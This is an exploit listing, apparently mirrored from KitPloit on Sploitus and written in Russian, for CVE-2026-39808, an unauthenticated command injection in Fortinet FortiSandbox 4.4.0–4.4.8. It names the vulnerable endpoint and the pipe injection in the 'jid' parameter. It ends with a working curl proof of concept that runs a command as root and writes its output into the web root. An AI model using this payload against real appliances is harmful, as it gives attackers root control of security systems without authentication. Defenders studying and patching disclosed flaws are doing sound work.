Sploitus

Exploit for CVE-2026-39808

kitploit · 2026-08-25

Exploit Code

MARKDOWN27 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SAMU-DELUCAS-CVE-2026-39808
# CVE-2026-39808

В ноябре 2025 года в FortiSandbox компании Fortinet была обнаружена критическая уязвимость, которая позволяла неаутентифицированному злоумышленнику выполнять команды в базовой операционной системе с правами root. Уязвимость была исправлена и наконец раскрыта в апреле 2026 года.

Эта уязвимость затрагивает версии FortiSandbox с 4.4.0 по 4.4.8.

Прочитайте полный бюллетень здесь.

## Уязвимость

Уязвимость затрагивает конечную точку `/fortisandbox/job-detail/tracer-behavior`. Команды ОС могут быть внедрены с помощью символа канала (`|`) в GET-параметре `jid`.

![image008](https://assets.kitploit.com/production/public/readmes/42526/9c9809996696e17f61933c340461458755625790f6e4c611659d85fa59f7bd35.png)

В приведённом выше примере вывод был перенаправлен в файл в корневом каталоге веб-сервера, чтобы его можно было получить позже.

![image](https://assets.kitploit.com/production/public/readmes/42526/5548e26110787bb5dc819f57fa4e9ecd9416f33181b8d720497aa0d7b650ca11.png)

## PoC

Простой команды curl достаточно для достижения RCE с правами root без предварительной аутентификации:

root@kitploit:~
    
    
    curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"